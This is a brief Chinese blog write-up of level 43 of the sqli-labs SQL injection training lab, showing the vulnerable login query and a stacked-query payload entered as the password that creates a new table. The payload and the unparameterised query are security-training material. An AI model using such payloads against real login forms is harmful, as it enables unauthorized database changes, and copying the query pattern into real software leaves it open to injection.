Sqli-labs less 43

Less-43

本关与42关的原理基本一致,我们还是定位在login.php中的password。看一下sql语句为:

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

登录:username:admin

Password:c');create table less43 like users#

 

 

可以看到在tables中已经出现了less-43表。

其他的操作这里就不进行演示了。

posted @ 2016-08-11 21:52  lcamry  阅读(500)  评论(0编辑  收藏  举报